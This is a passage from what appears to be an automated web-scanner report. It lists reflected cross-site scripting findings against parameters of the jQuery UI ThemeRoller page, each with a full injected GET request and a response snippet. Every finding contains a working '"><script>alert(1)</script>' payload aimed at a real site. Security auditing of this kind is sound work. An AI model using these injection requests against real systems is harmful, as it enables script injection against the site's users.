erlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.pngdb08e"><script>alert(1)</script>da74d127cad&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTex
...[SNIP]...

2.46. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d14ec"><script>alert(1)</script>5d04dd7c806 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
meroller&ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.pngd14ec"><script>alert(1)</script>5d04dd7c806&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666
...[SNIP]...

2.47. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5653"><script>alert(1)</script>a61da8af9c5 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.pngb5653"><script>alert(1)</script>a61da8af9c5&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B
...[SNIP]...

2.48. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7d42"><script>alert(1)</script>5be9fe66018 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.pnga7d42"><script>alert(1)</script>5be9fe66018&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC
...[SNIP]...

2.49. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0e2d"><script>alert(1)</script>60dbb8bd3af was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.pnge0e2d"><script>alert(1)</script>60dbb8bd3af&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerR
...[SNIP]...

2.50. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ea49"><script>alert(1)</script>bb88e881afa was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response. Because bgTextureShadow sits near the end of the query string, the response snippet below reaches the end of the attribute, which closes with " type="text/css" media="all" />: the sink is a stylesheet URL assembled from the entire query string, and every parameter in that string is reflected through the same attribute. Findings 2.42 through 2.53 are therefore one unescaped concatenation reported once per parameter, and a single fix at that concatenation closes all of them.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png3ea49"><script>alert(1)</script>bb88e881afa&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.51. http://jqueryui.com/themeroller/ [borderColorActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad9e"><script>alert(1)</script>111ada64c2c was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCCfad9e"><script>alert(1)</script>111ada64c2c&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B1000
...[SNIP]...

2.52. http://jqueryui.com/themeroller/ [borderColorContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39bc0"><script>alert(1)</script>e24a25cb4c9 was submitted in the borderColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
light_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC39bc0"><script>alert(1)</script>e24a25cb4c9&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorH
...[SNIP]...

2.53. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ef13"><script>alert(1)</script>dcecacde3c4 was submitted in the borderColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF3ef13"><script>alert(1)</script>dcecacde3c4&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8
...[SNIP]...

2.54. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c46a8"><script>alert(1)</script>1f7af90ed7f was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000c46a8